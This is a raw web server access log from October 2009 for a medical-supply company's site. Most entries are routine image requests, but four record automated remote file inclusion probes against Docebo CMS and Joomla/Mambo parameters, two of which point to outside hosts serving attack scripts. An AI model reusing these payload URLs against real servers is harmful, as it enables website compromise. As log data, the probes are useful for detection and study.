62.202.120.133 - - [06/Oct/2009:03:26:19 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
62.202.120.133 - - [06/Oct/2009:03:26:19 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
62.202.120.133 - - [06/Oct/2009:03:26:41 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
62.202.120.133 - - [06/Oct/2009:03:26:41 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
64.150.183.219 - - [06/Oct/2009:03:26:55 -0400] "GET /logs/access_log.Q109051600%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://bizadmin.hongik.ac.kr/bbs/data/__zbSessionTMP/fx29id1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
174.143.3.188 - - [06/Oct/2009:03:27:14 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
174.143.3.188 - - [06/Oct/2009:03:27:14 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
174.143.3.188 - - [06/Oct/2009:03:27:14 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
